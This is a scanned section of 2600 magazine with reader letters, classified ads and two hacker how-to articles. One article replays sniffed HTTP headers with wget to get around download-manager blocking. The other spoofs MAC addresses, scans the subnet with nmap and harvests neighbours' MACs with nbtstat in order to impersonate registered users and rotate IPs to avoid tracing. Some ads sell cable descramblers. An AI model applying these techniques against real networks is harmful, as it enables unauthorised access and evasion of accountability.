Yes, we do, but not for the holiday season that just passed. In fact we hope to have the DVD finished well before the next one. This project is dependent entirely on how much time we can allocate to it as well as how much money we can raise through video sales.
We expect to add quite a few features and additional footage, as well as other things. We're still open to suggestion on this.

Dear 2600:
I'll be more than happy to translate Freedom Downtime into Italian when you get the DVD out.
ElfQrin

As this is our latest project, we're in the process of getting a bunch of translations done as soon as possible. If you have suggestions or want to help out email us at downtime@2600.com.

Critique

Dear 2600:
I must voice my objection to the "angle" 2600 took on its coverage of Sherman Austin's indictment. I have always placed strong faith in 2600 and its position of supporting free speech. However the way in which your online article was worded reminded me of the tactics national news coverage often use to depict hackers. "It is not clear why Austin is being targeted; more detailed and potentially destructive bomb-making information is readily available at public libraries or on Amazon.com." It, to me at least, is very obvious that the reason why Sherman Austin is being targeted is because the man has upside down and burning American flags on his web site (www.raisethefist.com). Make an outcry for the man's right of free speech, cite the government's Gestapo-like tactics, but for pete's sake don't martyr a man because he likes some of your ideas at the expense of journalistic integrity. I admit some of Austin's ideas are appealing but right-wing-ism (making bombs, stickers calling us to arms, blatant disregard for the way others think) is not the 2600 that I have come to know. If it is then I for one feel that 2600 and I must go our separate ways.
AGEJ8

You may have already begun that journey. We stand by the story (which only appeared on our website and not in these pages) as an example of how someone with unpopular views can be indiscriminately targeted for prosecution while other more mainstream outlets of the same views remain untouched.
How you see us making a martyr of him is totally beyond us. And if you truly believe that only the right wing believes in the things you cite, we suggest reading some history or simply getting out a bit more.

Dear 2600:
Perception is reality. The perception (in the real world) is that all hackers are bad. So it's the reality. And that's that. I know you guys and the readers of the magazine think and know otherwise but what the real world perceives is reality. Get over it! There will never be good hackers.

Can you imagine a World War II veteran believing that there were good Nazis? Can you imagine an early American settler believing that there were good Indians? Can you imagine a southern redneck believing that there are good N....? No way. No one but the readers of this magazine (who are so paranoid that 92 percent of them buy it off the rack) will ever believe that there are good hackers. No amount of money or promotion or ranting will change that.

On top of that you title your magazine "2600." Do you really know what 2600 is? Let me tell you what it is in the real world. It's a four digit number that stands for a five letter word: fraud. Nobody who built a blue box or who gleefully calls themselves a "phone phreak" is interested in privacy or security or any of the artful dodges used to describe good hackers. They were and are interested in screwing Ma Bell. In a word, stealing. It's ludicrous.

Then inside the magazine there are lovely articles about how to cheat Blockbuster, say naughty words on the scoreboard during a football game (not really but if you couldn't read that between the lines get an imagination), a lovely personal ad for a guy who wants to break into homes through garage doors when he gets out of prison, another from a prisoner who is a virus writer wanting help to become an expert in his chosen hacker skills, and a third that can only be described as pornographic. Do you guys have editors? Do you have editorial standards?
I know you live on Long Island, but please! If your magazine is for good hackers, presumably those with nothing to fear from the law, then why are the vast majority of articles and letters authored/signed by persons using pseudonyms? May I answer?

Your magazine, as currently published, can easily be shown to be a thinly disguised manual for criminals. You have every right to publish it and to rant and rave that you're really the good guys. I maintain that an objective (and probably even computer ignorant) reviewer would conclude that you're delusional at best. As a computer knowledgeable person who has been on this planet for just less than 0x40 years I applaud your defense of free speech, fair use, and other freedoms. I abhor your wink and nod approach to criminal activity.

Well, it's not fair to criticize without offering an alternative so here it is. Instead of hackers (who are bad and acknowledged as bad) and 2600, change the title of your group and the name of your magazine to "Sweepers." Like all else these days, it's an acronym. System Weakness Exploration Explanation (not Exploitation!) Publication Ethical Remediation Standards.

That's what "good" hackers do. They explore systems with the principal intent to learn. When (if) they find a weakness they explain it and, in a responsible way, publicize it and hopefully publicize workarounds (remediation). All of this is done in an ethical way following published standards with no intent for monetary gain (intellectual gain is fine, indeed the main motivation).

Standards for publication by a Sweeper should include letting the author know first. Wider publication should be done only if the author fails to respond and only if a suitable workaround is published at the same time. Absent a suitable workaround and author response, the publication should be limited to "there's a problem with product x and the author won't deal with it."
not what the problem is or how to trash the system and show the author just how smart and powerful we are! Letting the world know that independent, better-than-average beta testers (our word is sweepers) have discovered a significant problem will, in most cases, sufficiently affect sales and the author will get the message very quickly.

These standards can be easily adapted to editorial standards as well, although the magazine might get thinner for a while.

Dave D.

After taking a vote, we've decided to take offense at being compared to Nazis. We're going to let the Long Island remark slide. That aside, you raise some interesting points. But you also claim to know, among other things, how the whole world perceives a particular group of people, what's going through our heads, as well as the intentions of everyone who writes in to us. While some of the worst element that you describe does in fact exist, to say that it is the norm and that we encourage this kind of thing is unfair and highly inaccurate. You clearly don't know the history and you cannot know what people get out of the articles they read and write in our pages. The only advice we can offer is that you stop assuming that everyone thinks like you. Best of luck in the sweeper world.

Significant Developments

Dear 2600:

Well I don't know if you care but I am in the group 2600 for seti@home and ironically, I just hit 2600 results sent! Just wanted to let ya know, not that you probably care!

RusH

Of course we care. Although we're quite disappointed that this magic number didn't result in a discovery. This is one of the most worthwhile projects we're aware of and for those who want to get involved and learn a whole lot more about it, go to http://setiathome.ssl.berkeley.edu.
Dear 2600:

According to an article at newscientist.com, in the year 2600 an asteroid that orbits the sun along the same path as the Earth will in fact orbit the Earth for 50 years as a second moon. Amazing... even the heavens and the earth are controlled by 2600.

fstratto

Incidentally, we're planning on cutting our subscription price in half for the entire year of 2600 as a special promotion. Stay tuned for more details.

Defining Hackers

Dear 2600:

I am no important sports star, I am not the lead actor in the school play, nor the highly grungieal youth who pedals the hallways in search of some untimely demise. I am me. I am here for who I am, not a follower of a group nor a piece of a puzzle. Let me instead be considered the shepherd to a flock of sheep. But that flock weighs so heavily on the judgmental aspects of society. You see, this flock and I are those that long for what is never achieved, strive for what is never gained, hope for the light at the end of the tunnel that is too long to walk, too strenuous to master. We are those unlike others. We may not fit society's mold of the "conventional norm," we may not walk the guidelines to call us average. But then again, who would want to be average? A fact once stated, "One out of every 250,000 people has a brief moment of glory, one out of every 500 people will be remembered within 10 years of their glory, but only one man will ever be remembered as the man that dare break the boundaries and rules." This is what we do. We are that one person, us as a flock, a whole. Groups slowly fade. Fashions slowly die out. We are unlike any other. Put us in a box and we will scale the walls to free ourselves. We do not crumble, nor cry, nor separate. We are brothers and we are sisters. Hath not the fury of ten thousand burning suns to melt us, nor ten thousand blows of the heaviest hammer to break us. We are Hackers and we are Phreakers. Fh34r us now, but do not expect the feeling to be mutual.
fflx deacon

It's moments like these when it becomes clear that we could start a cult and probably get away with all kinds of things. But seriously, let's not lose touch with our human origins.

Reaching Out

Dear 2600:

Greetings. I've been reading your magazine for a few years now, glancing at the website on various occasions as curiosity demanded. I currently live in one of the larger cities in Alabama and through my day job became familiar with one of the men running for Senator here in the state. He approached me seeking information about maintaining an Internet broadcasting system (in fact, a few meetings went by without me being aware that he was in the running). This particular person seemed at least somewhat familiar with the computer world although his lack of experience and knowledge had me worried for a little while in regards to the laws recently passed that affect net broadcasters. I brought this to his attention and even loaned him a few of my 2600 issues in hopes that he'd get a better idea of what he was in for. Days went by and he came back to me with my books, full of questions which I did my best to answer and a lot more determined to do what he could in order to affect changes within his scope in the Senate race. Sadly though, he didn't win. This however hasn't changed his views (which were recently broadened by 2600 I might add). I guess this goes to show that while corruption may in fact be all over the U.S. and other parts of the world, there are those people who do want to make a change and who do want a better life for not only themselves but their children and beyond.

It may not seem like there is much point to this letter but it has been quite a change of pace compared to the normal routine I run into that all "hackers are evil and thieves, etc... blah blah blah."
It has also shown me personally that there are people trying to get into positions in order to affect changes that would not only benefit certain communities, but attempt to undo some of the wrong decisions made before them.

Nygfafl

We're going to need a whole bunch of these people. We're grateful for your efforts in planting some seeds.

BEATING DOWNLOAD MANAGER PROTECTION

by Straightface
straightfacegangsta@excite.com

While searching for interesting files on the net you may encounter a file that has been "Download Manager Blocked," meaning that you must use a browser to get the file. If you attempt to download the file with a download manager, you will receive a lovely text message in place of the file you desired informing you of your "mistake." Some may feel defeated, but with a little sleight of hand you can use a download manager to retrieve the file.

The initial question we have to ask ourselves is "how in the world does the server know whether the program making the download request is a browser or not?!?" The answer can be found by analyzing the HTTP headers the browser sends in its request for the file. The server attempts to protect itself from download managers by checking for particular HTTP headers. Usually it checks the "User Agent" header and can also check for a cookie or referring page header.

First we must fill our tool box with the proper tools. We will need a packet sniffer to learn how the browser is communicating with the server. Sniffit is a nice one for Linux. If using Windows, WinDump works well. Be aware the WinPcap libraries are needed for WinDump to work properly and can be found at the WinDump web site. I also employ the Windows program Dice to read the raw files WinDump creates. We are also going to need a nice customizable download manager. For this I choose wget. It is available for both Linux and Windows, free, and has a very small footprint.
Once we have all the tools ready we can begin to collect the proper HTTP headers. Start up the browser of your choice and bring it to the web page with the link of the file you want to download. Make sure you have your cookies enabled on the browser. Now it is time to start up our packet sniffer. Make sure you are sniffing the right interface. In this example the interface is ppp0. WinDump requires you to first run it with the -D option for a list of interfaces and then you must choose the proper one. See the documentation for full details.

Using sniffit:

    sniffit -t @ -F ppp0

Using windump:

    windump -w output.cap -i 1

Now we are all set to capture the headers. Go back to your browser and click on the proper link for the file. Choose a place for it to reside and start the download. Let the file download a few kilobytes, then stop it. Now let's look at the packets we captured. Sniffit will leave behind some files with names like "65.23.29.34.33265-208.48.67.24.80" which you can view with your favorite text editor. When using WinDump, opening the output file with Dice will give you a list of all the packets you caught. The packets of interest are usually the first few leaving your machine. You can tell it is leaving as the first IP address' port number is pretty large, such as in the example file name above. Find the HTTP request the browser sent. It will look something like this:

    GET /myDLmanagerblockedfile.avi HTTP/1.0
    Connection: Keep-Alive
    User-Agent: Mozilla/4.78 [en] (Linux 2.4.8 i686)
    Host: nodlme.com
    Accept: image/gif, image/jpeg, image/pjpeg, image/png, */*
    Accept-Encoding: gzip
    Accept-Language: en
    Accept-Charset: iso-8859-1,*,utf-8
    Cookie: f908dkl=93
    Referer: http://www.nodlme.com/video5.html

Ah ha! There are some odd HTTP headers in the request. The two lines we want to pay attention to are the "Referer" and "Cookie" lines. We also need to include the "User Agent" header in our download manager's request.
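The server-side check the article describes can be written down in a few lines, which makes its limits visible: every value it tests is supplied by the client. This is an added example, not code from the article or from any real site; the policy in `gate_rejections` is an assumed reading of "checks the User Agent, a cookie or the referring page", and the download manager's default request is constructed.

```python
from urllib.parse import urlsplit

# Constructed sample: the browser request as captured in the article.
BROWSER = """\
GET /myDLmanagerblockedfile.avi HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.78 [en] (Linux 2.4.8 i686)
Host: nodlme.com
Accept: image/gif, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Cookie: f908dkl=93
Referer: http://www.nodlme.com/video5.html
"""

# Constructed sample: a download manager sending only its default headers.
MANAGER = """\
GET /myDLmanagerblockedfile.avi HTTP/1.0
User-Agent: Wget/1.8.2
Host: nodlme.com
Accept: */*
"""


def parse_request(raw):
    """Return (request_line, headers); header names are lower-cased."""
    lines = raw.replace("\r\n", "\n").split("\n")
    request_line, headers = lines[0].strip(), {}
    for line in lines[1:]:
        if not line.strip():              # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def gate_rejections(headers, site="nodlme.com", cookie_name="f908dkl"):
    """Hypothetical 'browsers only' gate: list the reasons a request is refused."""
    reasons = []
    if not headers.get("user-agent", "").startswith("Mozilla/"):
        reasons.append("user-agent is not a browser string")
    host = urlsplit(headers.get("referer", "")).hostname or ""
    if host != site and not host.endswith("." + site):
        reasons.append("referer is not a page on this site")
    names = [c.strip().split("=", 1)[0] for c in headers.get("cookie", "").split(";")]
    if cookie_name not in names:
        reasons.append("session cookie missing")
    return reasons


def header_diff(reference, candidate):
    """Headers of `reference` that `candidate` lacks or sends with another value."""
    missing = sorted(h for h in reference if h not in candidate)
    different = sorted(h for h in reference
                       if h in candidate and candidate[h] != reference[h])
    return {"missing": missing, "different": different}


def with_copied_headers(candidate, reference,
                        names=("user-agent", "cookie", "referer")):
    """Copy the named header values from `reference` into a copy of `candidate`."""
    merged = dict(candidate)
    merged.update({n: reference[n] for n in names if n in reference})
    return merged


if __name__ == "__main__":
    _, browser = parse_request(BROWSER)
    _, manager = parse_request(MANAGER)
    print("browser :", gate_rejections(browser))
    print("manager :", gate_rejections(manager))
    print("diff    :", header_diff(browser, manager))
    print("copied  :", gate_rejections(with_copied_headers(manager, browser)))
```

The last call shows the gate accepting the second client once the three values are copied, so the check identifies header contents, not the program sending them.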
Now we know how to emulate the browser! Finally, let's set wget to retrieve the file. The wget command using the above captured packets will look like this:

    wget --user-agent='Mozilla/4.78 [en] (Linux 2.4.8 i686)' \
         --header='Cookie: f908dkl=93' \
         --header='Referer: http://www.nodlme.com/video5.html' \
         http://www.downloadme.com/myDLmanagerblockedfile.avi

The file should begin to download properly. If it gives you the "No Download Managers" message you might have missed another abnormal HTTP header. You can sniff the browser's request for the file and then sniff wget's request and see how they differ to find your missing header. Simply include the missing header in your wget command with the --header option. For serious downloading, wget has options to download a list of files, but I usually just set up a bunch of wget commands in a batch file.

Have fun with your knowledge of packet sniffing and HTTP headers! They are great tools for your own personal toolbox....

URLs Used

Dice: http://www.ngthomas.co.uk/dice.htm
Sniffit: http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
wget (Linux): http://www.gnu.org/software/wget/wget.html
wget (Win32): http://space.tin.it/computer/hherold/
WinDump: http://windump.polito.it/

DHCP IS YOUR FRIEND!

by diOnysus

Did you ever wonder when you turn on your computer to surf the web how the heck your computer knows what IP to use? If you are reading this article, chances are you already know. For those who don't know, I will give you a little background before revealing how this magic can be used for good... err... evil... well... you can choose exactly how you use your newfound knowledge.

This magical union between your computer and your ISP's server is known as DHCP (Dynamic Host Configuration Protocol). When you turn on your computer, or anytime you request it to,
it sends a request via UDP on port 67 or 68 asking for information on how it should configure the network interface. Information like what DNS server to use, what IP and netmask to use. DHCP was created by the Dynamic Host Configuration Working Group of the Internet Engineering Task Force (wow, that was a mouthful). In this article I will concentrate more on how it works than where it came from. We will leave its origins for a more boring article another time. I will also explain how to bend it to your will....

Why Should I Care About DHCP?

One of the first lessons every aspiring script kiddy learns is the importance of his IP. Your IP is what identifies you to the rest of the Internet. When you spew packets from your computer, this magic number is recorded all over the place, like footprints in the snow saying "I was here." The only people who can quickly trace this number to your actual computer are your service providers. Coincidentally they are also the ones handing out the IPs (insert sarcasm here). So what if you could have 30 different IPs in an hour? That would sure make tracing you a lot harder. Easy, right? Just request a new IP from the magical DHCP server and rejoice. I wish it were that simple.

When you get an IP from the DHCP server it assigns you a lease. This lease is the amount of time that it will give you the same IP. Also, some ISPs, like my local ISP, require you to register your MAC address with them or their DHCP server will never give you an IP in the first place. The MAC address (Media Access Control) is the unique hardware address given to your network card by its manufacturer. This gives them an extra level of "security." Security is in quotes because I will demonstrate how to fool the DHCP server into thinking you are someone else. Lastly, you have a cache on your end that also says what IP you had last time you hooked up with the DHCP server. If your lease is still good the server will try to give you the same address again.
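Seen from the operator's side, MAC registration only checks a value the client chooses, so the useful signal is where each MAC shows up and how often a single connection changes it. The following is an added example, not from the original article: it assumes the DHCP server log can be reduced to time-ordered `time port mac` lines (constructed here) and that the operator knows the attachment point each MAC was registered at, for instance from DHCP relay agent information; `REGISTERED`, `audit` and the threshold are hypothetical.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed registry: MAC address -> attachment point it was registered at.
REGISTERED = {
    "00:50:da:0a:24:26": "port-17",
    "00:10:5a:aa:bb:01": "port-22",
}

# Constructed, time-ordered DHCP request log: timestamp, attachment point, client MAC.
LOG = """\
2003-01-15T20:00:05 port-17 00:50:DA:0A:24:26
2003-01-15T20:10:41 port-17 00:50:DA:0A:24:27
2003-01-15T20:18:02 port-17 00:50:DA:0A:24:28
2003-01-15T20:25:30 port-17 00:50:DA:0A:24:29
2003-01-15T21:40:00 port-17 00:10:5A:AA:BB:01
2003-01-15T23:05:00 port-22 00:10:5A:AA:BB:01
"""


def parse(log):
    """Yield (datetime, port, mac) for each non-empty log line."""
    for line in log.splitlines():
        if not line.strip():
            continue
        stamp, port, mac = line.split()
        yield datetime.fromisoformat(stamp), port, mac.lower()


def audit(log, registered, max_macs_per_hour=3):
    """Return findings as (kind, port, mac) tuples, in log order.

    UNREGISTERED  the MAC is not in the registry at all
    MOVED         a registered MAC arrives through someone else's attachment point
    CHURN         one attachment point presented more than `max_macs_per_hour`
                  distinct MACs within a sliding one-hour window
    """
    findings = []
    recent = defaultdict(deque)      # port -> (time, mac) pairs from the last hour
    for when, port, mac in parse(log):
        home = registered.get(mac)
        if home is None:
            findings.append(("UNREGISTERED", port, mac))
        elif home != port:
            findings.append(("MOVED", port, mac))

        window = recent[port]
        window.append((when, mac))
        while when - window[0][0] > timedelta(hours=1):
            window.popleft()         # drop requests older than one hour
        if len({m for _, m in window}) > max_macs_per_hour:
            findings.append(("CHURN", port, mac))
    return findings


if __name__ == "__main__":
    for kind, port, mac in audit(LOG, REGISTERED):
        print("%-12s %s %s" % (kind, port, mac))
```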
Getting the same address back is nice if you have a domain name registered to a home account, but not so nice if you want to do some port scanning. You would never do anything like that, right?

Get To The Good Stuff Already!

So now we know a little about how DHCP works. Let's get into how it can be useful. This article assumes that you are using a Linux box as a firewall/router for internal Windows boxes. I will also assume that you have installed the Cygwin package from RedHat on your Windows box. If you have not installed Cygwin you should really check it out. It gives you much Unix like functionality on your Windows box, not the least of which is perl, which we will be using later. Cygwin is free at http://sources.redhat.com/cygwin/.

The Non-Authenticating DHCP Server

This could also be called the "easy to fool DHCP server," simply because it will hand out an IP to any old MAC address. As mentioned, our MAC address is what the DHCP server uses to keep track of who's who. Unlike the authenticating DHCP server, we will not need to perform any real magic to get a new IP. For the rest of the article I will assume that we are using eth0 for our external interface on our Linux box. Let's do some initial checking. To find our MAC address we can simply do an 'ifconfig -a eth0'. Or, if we really want to feel like Unix [...] we can use:

    ifconfig -a eth0 | head -1 | cut -f 11 -d " "

This command will become useful later when you write a script to automate the new IP process, right? We also need to take a look at our DHCP cache. Let's do an 'ls /etc/dhcpc'. You will likely see the following files: dhcpcd-eth0.cache, dhcpcd-eth0.info, and dhcpcd-eth0.info.old. We can safely remove these files with an 'rm -f /etc/dhcpc/dhcpcd-eth0*' because we don't want the DHCP server to know that we ever had an IP. The next thing we need to do is "change" the MAC address that will be sent to the server. First, make a note of our MAC address.
It will be something like 00:50:DA:0A:24:26. Let's change it to 00:50:DA:0A:24:27 and try to get a new IP. First we need to take down the interface with an 'ifconfig eth0 down' and then we can change the MAC address with an 'ifconfig eth0 hw ether 00:50:DA:0A:24:27'. Now we bring the interface back up with 'ifconfig eth0 up' and last but not least we request our new IP with '/sbin/ifup eth0' and voila! You have a new IP. If you got the same IP you had before, you probably forgot to delete the cache in /etc/dhcpc. At this point it should be painfully clear how these concepts could be incorporated into a script for things like port scanning or whatever your devious mind desires.

The Authenticating DHCP Server

This is where it gets a little tricky. Some ISPs (like my ISP) require you to register your MAC address so they can control which computers have access to their network. So, what's a boy to do? Grab a list of IPs and MAC addresses, wait for an IP-MAC address to go down, and use that MAC to fool the DHCP server into thinking that you are someone else. Easy, right? The hard part is how we get the MAC addresses. Luckily Microsoft has provided us with an easy way to query MAC addresses from remote computers. Netbios strikes again!

First we need to generate a list of IPs of computers that are on our subnet. If our IP is 24.64.220.20 then we can be pretty sure that all of the people on [...] have registered MAC addresses. We will do an NMAP scan on port 139 (netbios port) on our subnet and generate a list of IPs to query for MAC addresses.

    nmap -sS -p 139 -oM ... | grep open | cut -d " " -f 2 > ip_list

will generate our list. This should work on Linux and Windows (if you have installed Cygwin and NMAP). Then we need to get MAC addresses for all of the IPs. This can get a little ugly when you have to do it manually.
On our Windows box the command 'nbtstat -A [IP Address]' will give us the MAC address of the remote host as well as some other useless info. Here is a little script to generate an IP-MAC table. We will need to do a 'cat ip_list | perl this_script' on our Windoze box.

    while (<>) {
        chomp;
        $ip = $_;
        # keep only the "MAC Address = ..." line of the nbtstat output
        chomp($mac_raw = `nbtstat -A $_ | grep MAC`);
        # the fourth whitespace-separated field is the address itself
        (undef, undef, undef, $mac) = split(' ', $mac_raw);
        print "$ip $mac\n";
    }

Redirect the output to a file and wait a few minutes. Then run the script again and see which IPs don't return a MAC address. These computers are no longer accessible meaning that their MAC can be used to authenticate against the DHCP server. Follow the steps outlined above using your newfound MAC address and you are on your way.

Final Thoughts

While using multiple IPs is a good way to cover your tracks, it is in no way a magic ring that makes you invisible on the Internet. Think of it more as an added layer of confusion when trying to follow your tracks. At the very least I hope that you learned about Cygwin and how it can add a whole new dimension to your Windows world. I have written several scripts around these concepts. Feel free to email me for copies. Happy hax0ring!

Happenings

INTERZ0NE II. April 11-13, 2003. Atlanta's hacker con is starting another eye opener! Come educate or gain knowledge in today's issues. All needed info is on site: www.interz0ne.com or email: contact@interz0ne.com (That's interz0ne, spelled with a zero!)

SAN FRANCISCO OPENBSD USERS GROUP now meeting once a month at Goat Hill Pizza, first Mondays at 7 pm - for info see http://www.sfobug.org.

For Sale

IP-BLIND OUTGOING SMTP TUNNEL suitable for installation behind any web-proxy firewall per year. Will completely disassociate your outgoing emails from your employer's network. Send check to Tipjar, Box 43 1 fi3, Kansas City, MO 64171.
Include a good email address for yourself where we will send you the client half of the software. This is for privacy and sidestepping restrictive corporate communications directives, NOT bulk mail T.O.S. violations. Your check will not be deposited until you declare your satisfaction.

HACKERSTICKERS.COM - Get your geekish nerd related hacker stickers for your laptops, cars, and gear. All different colors and new designs. www.hackerstickers.com.

THE SLICER'S GUILD, a slowly growing group, is taking orders for our first issue of the Slicer's Guild magazine for only $5 (U.S.). Find out why we call ourselves "slicers" and why our hacker magazine is complementary to 2600 and not competitive. This will not be offered as a subscription yet. You will have to check Marketplace for when the second issue becomes available. Send your request with a money order along with anything else you might want to be printed in a future issue to Ijrry liaaiii Wheeler K 1 7592, KWH S. Hwy 2037, Fort Stockton, TX 79735 USA.

WORLD'S FIRST "DIGITAL DRUG." Hackers, get ready to experience the next level in wetware technology! VoodooMagickBox is a 100% legal and safe way to enter into a drug-like trip. All you need to do is place the clips on your ears and turn the knob on the VoodooMagickBox. It's like nothing you've ever tried! For details and ordering information, visit www.voodoomagickbox.com (money orders and credit cards accepted).

CABLE TV DESCRAMBLERS. New, (2) Each JUS + $5.00 shipping, money order/cash only. Works on analog or analog/digital cable systems. Premium channels and possibly PPV depending on system. Complete with 110vac power supply. Purchaser assumes sole responsibility for notifying cable operator of use of descrambler. Requires a cable TV converter (i.e., Radio Shack) to be used with the unit. Cable connects to the converter, then the descrambler, then the output goes to TV set tuned to channel 3.
CD 9621 Olive, Box 28992-TS, Olivettet Sur, Missouri 63132. Email: cabledescramblerguy@yahoo.com.

REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the like? For a copy of Infiltration, the zine about going places you're not supposed to go, send $2 to PO Box 13, Station E, Toronto, ON M6H 4E1, Canada.

INTERESTED IN PIRATE AND LEGAL DO-IT-YOURSELF RADIO? Hobby Broadcasting magazine is dedicated to DIY radio and broadcasting of all types. 52 pages. $3/sample, $13/4 issues to Hobby Broadcasting, POB 642, Mont Alto, PA 17237. www.hobbybroadcasting.com.

W W W.PRQTECTAJNELCOM. Protect yourself! Everyone has a need to be and feel safe from the outside world. We carry a full line of self defense, security, and surveillance products at low prices. Everything from alarms to mini cameras to telescopic batons to stun guns and more! Check us out, all major credit cards accepted. We ship worldwide!

FREEDOM DOWNTIME, the feature-length 2600 documentary, is now available on video! See the adventure unfold as we try to get to the bottom of the Kevin Mitnick story and prevent a major motion picture from spreading more lies. Available on VHS in NTSC (U.S.) format, 121 minutes. Send $20 to 2600, PO Box 752, Middle Island, NY 11953 or order via our online store at www.2600.com.

MACINTOSH HACKERS can get all the mac underground files on a professionally published CD. 650 Megs of PURE mac files. Includes the Defcon 7 Macintosh security speech, the whole Freaks Macintosh Archives and Whacked Mac Archives. $25.00 USD - will ship internationally. SecureMac, PMB 310, 6170 W. Lake Mead Blvd., Las Vegas, NV 89108, USA. Hack from your Mac!

HACKER T-SHIRTS FROM YOUR FAVORITE GROUPS, along with a plethora of our own designs. Jinx Hackwear is selling t-shirts, sweatshirts, and hats for groups such as Defcon, Phrack Magazine, Cult of the Dead Cow, Packet Storm, HNC, Collusion,
Password Crackers Inc., HNS, Hackers.com, Astalavista, and New Order. New site with Forums, Hacker News, Conference Updates, LAN Party listings, a Photo Gallery, and a chance to Speak Out. Check it out! http://www.JinxHackwear.com

LEARN LOCK PICKING It's EASY with our new book. We've just released a new edition adding lots more interesting material and illustrations. Learn what they don't want you to know. Any security system can be beaten, many times right through the front door. Be secure. Learn the secrets and weakness of today's locks. If you want to get where you are not supposed to be, this book could be your answer. Explore the empowering world of lock picking. Send twenty bucks to Standard Publications, PO Box 2226HQ, Champaign, IL 61825 or visit us at www.standardpublications.com/direct/2600.html for your 2600 reader price discount.

COVERTACCESS.COM - Amazing EQUIPMENT and SERVICES providing you with the physical and records access you need!

OVER 150 TELECOM MANUALS are now available online for free viewing/downloading at The Synergy Global Network's fully redesigned website. Most being available in Adobe PDF format, they are crisp, clean, suitable for printing, and complete. Update your phreak library now before it's too late. We don't know how long this website will be allowed to distribute these manuals, however they are yours for the time being. Our website is free and open to the public, and requires no purchase of any kind, and is also free from pop-up (or pop-under) advertisements as well. PAYPHONE SERVICE MANUALS TOO! Visit us online at: http://www.synergyglobalnetworks.com.

CAP'N CRUNCH WHISTLES. Brand new, only a few left. THE ORIGINAL WHISTLE in mint condition, never used. Join the elite few who own this treasure! Once they are gone, that is it - there are no more! Keychain hole for keyring. Identify yourself at meetings, etc.
as a 2600 member by dangling your keychain and saying nothing. Cover one hole and get exactly 2600 hz, cover the other hole and get another frequency. Use both holes to call your dog or dolphin. Also, ideal for telephone remote control devices. Price includes mailing. $69.65. Not only a collector item but a VERY USEFUL device to carry at all times. Cash or money order only. Mail to: WHISTLE, P.O. Box 11562-ST, Clt, Missouri 63105.

HATE MICROSOFT? Or do they just leave a foul aftertaste? Show your dissatisfaction with a "Calvin peeing on Microsoft" sticker. Sticker is approx. 1~*T and fits nicely in a car window or even on the side of your favorite *nix box. Each sticker is made of commercial grade vinyl. Water and UV ray resistant. To see a sample go to http://calvinhatesmicrosoft.hypermart.net. $7.00 (US), Slfi-00 (US) for international. Order the Calvin sticker and the MS logo is yours free. That's right, THE MICROSOFT LOGO IS FREE (eat that one, Bill). Send all orders to CD Mayne, PO Box 571791, Murray, Utah 84157 USA. Cash or money orders only. No checks, credit cards, or COD. Allow 2-3 weeks for delivery via USPS.

Help Wanted

HIRING PROFESSIONAL INTERNET CONSULTANTS with job references only for the following: website security, performance tuning, and marketing for online magazine. Please send your bio and resume to: jbhartswciribWyahoo.com - you can work from home, but should live in (or around) NYC, as you will need to attend a meeting or two.

NEED ASSISTANCE to rescue/recover ASCII text data which are presently compressed/encrypted by some type of commercial program. Most files are rather large, from 30 MB to about 600MB. Using DOS based search engine for retrieval. Please advise if there ex-